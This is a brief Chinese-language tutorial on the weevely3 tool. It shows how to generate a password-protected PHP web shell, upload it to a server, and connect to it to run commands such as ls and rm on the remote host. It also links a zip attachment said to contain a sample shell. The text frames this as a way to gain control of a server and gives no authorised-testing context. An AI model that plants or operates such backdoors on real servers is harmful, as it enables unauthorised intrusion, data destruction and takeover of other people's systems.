https://github.com/epinna/weevely3
weevely是一款网页木马生成工具(仅限php),使用该工具可以生成php程序木马,从而实现拿权。
这里以kali系统使用为例,其他系统可先安装该工具后操作:
生成文件(这里以密码test为例):
weevely generate test ~/test.php
拷贝下来,保存到php文件中并上传到服务器,这里以t.php文件名为例(样例文件详见附件)。
本地使用以下命令登陆到远程主机(地址换成实际地址):
附件下载 https://www.cnop.net/uploadfile/2020/0324/20200324033904986.zip
weevely http://192.168.1.100/t.php test
此时就可以使用常规的ls,rm等命令操作服务器上的文件了。